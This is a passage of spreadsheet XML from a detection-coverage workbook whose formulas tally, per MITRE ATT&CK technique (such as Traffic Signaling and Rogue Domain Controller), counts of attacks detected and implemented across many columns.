      <c r="AX39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY39" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ39" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA39" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC39" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>0</v>
      </c>
      <c r="BD39" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>0</v>
      </c>
      <c r="BE39" s="4" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF39" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>0</v>
      </c>
      <c r="BG39" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0</v>
      </c>
      <c r="BH39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>0</v>
      </c>
      <c r="BI39" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ39" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK39" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL39" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM39" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO39" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>0</v>
      </c>
      <c r="BP39" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>0</v>
      </c>
      <c r="BQ39" s="4" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR39" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS39" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>0</v>
      </c>
      <c r="BT39" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>0</v>
      </c>
      <c r="BU39" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>0</v>
      </c>
      <c r="BV39" s="292">
        <v>0</v>
      </c>
      <c r="BW39" s="322">
        <v>0</v>
      </c>
      <c r="BX39" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY39" s="12">
        <v>0</v>
      </c>
      <c r="BZ39" s="13">
        <v>0</v>
      </c>
      <c r="CA39" s="394">
        <v>0</v>
      </c>
      <c r="CB39" s="288">
        <v>0</v>
      </c>
      <c r="CC39" s="4">
        <v>0</v>
      </c>
      <c r="CD39" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE39" s="4">
        <v>0</v>
      </c>
      <c r="CF39" s="4">
        <v>0</v>
      </c>
      <c r="CG39" s="13">
        <v>0</v>
      </c>
      <c r="CH39" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A40" s="4">
        <f t="shared" si="13"/>
        <v>38</v>
      </c>
      <c r="B40" s="4" t="str">
        <f>IFERROR(VLOOKUP(A40,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1205</v>
      </c>
      <c r="C40" s="493" t="str">
        <f>IFERROR(VLOOKUP(B40,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Traffic Signaling</v>
      </c>
      <c r="D40" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B40)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E40" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F40" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (5)</v>
      </c>
      <c r="G40" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>2</v>
      </c>
      <c r="H40" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I40" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="J40" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K40" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M40" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N40" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O40" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P40" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q40" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S40" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>2</v>
      </c>
      <c r="T40" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U40" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1 (2)</v>
      </c>
      <c r="V40" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W40" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>3</v>
      </c>
      <c r="Z40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA40" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (3)</v>
      </c>
      <c r="AB40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC40" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>4</v>
      </c>
      <c r="AG40" s="322" t="str">
        <f t="shared" si="4"/>
        <v>4 (4)</v>
      </c>
      <c r="AH40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI40" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>7</v>
      </c>
      <c r="AL40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>6</v>
      </c>
      <c r="AM40" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (7)</v>
      </c>
      <c r="AN40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>4</v>
      </c>
      <c r="AO40" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ40" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR40" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS40" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT40" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU40" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>1</v>
      </c>
      <c r="AX40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY40" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ40" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA40" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC40" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>3</v>
      </c>
      <c r="BD40" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>2</v>
      </c>
      <c r="BE40" s="4" t="str">
        <f t="shared" si="8"/>
        <v>2 (3)</v>
      </c>
      <c r="BF40" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG40" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI40" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>1</v>
      </c>
      <c r="BJ40" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>1</v>
      </c>
      <c r="BK40" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL40" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM40" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO40" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>3</v>
      </c>
      <c r="BP40" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>3</v>
      </c>
      <c r="BQ40" s="4" t="str">
        <f t="shared" si="10"/>
        <v>3 (3)</v>
      </c>
      <c r="BR40" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS40" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT40" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU40" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV40" s="292">
        <v>1</v>
      </c>
      <c r="BW40" s="322">
        <v>1</v>
      </c>
      <c r="BX40" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY40" s="12">
        <v>1</v>
      </c>
      <c r="BZ40" s="13">
        <v>1</v>
      </c>
      <c r="CA40" s="394">
        <v>1</v>
      </c>
      <c r="CB40" s="288">
        <v>2</v>
      </c>
      <c r="CC40" s="4">
        <v>2</v>
      </c>
      <c r="CD40" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE40" s="4">
        <v>1</v>
      </c>
      <c r="CF40" s="4">
        <v>1</v>
      </c>
      <c r="CG40" s="13">
        <v>1</v>
      </c>
      <c r="CH40" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A41" s="4">
        <f t="shared" si="13"/>
        <v>39</v>
      </c>
      <c r="B41" s="4" t="str">
        <f>IFERROR(VLOOKUP(A41,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1207</v>
      </c>
      <c r="C41" s="493" t="str">
        <f>IFERROR(VLOOKUP(B41,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="D41" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B41)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E41" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>88</v>
      </c>
      <c r="F41" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (88)</v>
      </c>
      <c r="G41" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>62</v>
      </c>
      <c r="H41" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>58</v>
      </c>
      <c r="I41" s="322" t="str">
        <f t="shared" si="0"/>
        <v>58 (62)</v>
      </c>
      <c r="J41" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>4</v>
      </c>
      <c r="K41" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>33</v>
      </c>
      <c r="M41" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N41" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O41" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P41" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q41" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S41" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>62</v>
      </c>
      <c r="T41" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>58</v>
      </c>
      <c r="U41" s="4" t="str">
        <f t="shared" si="2"/>
        <v>58 (62)</v>
      </c>
      <c r="V41" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="W41" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>33</v>
      </c>
      <c r="Y41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>94</v>
      </c>
      <c r="Z41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>80</v>
      </c>
      <c r="AA41" s="322" t="str">
        <f t="shared" si="3"/>
        <v>80 (94)</v>
      </c>
      <c r="AB41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>4</v>
      </c>
      <c r="AC41" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>47</v>
      </c>
      <c r="AE41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>12</v>
      </c>
      <c r="AF41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>10</v>
      </c>
      <c r="AG41" s="322" t="str">
        <f t="shared" si="4"/>
        <v>10 (12)</v>
      </c>
      <c r="AH41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>10</v>
      </c>
      <c r="AI41" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>3</v>
      </c>
      <c r="AK41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>106</v>
      </c>
      <c r="AL41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>90</v>
      </c>
      <c r="AM41" s="322" t="str">
        <f t="shared" si="5"/>
        <v>90 (106)</v>
      </c>
      <c r="AN41" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>16</v>
      </c>
      <c r="AO41" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP41" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>48</v>
      </c>
      <c r="AQ41" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR41" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS41" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT41" s="12">
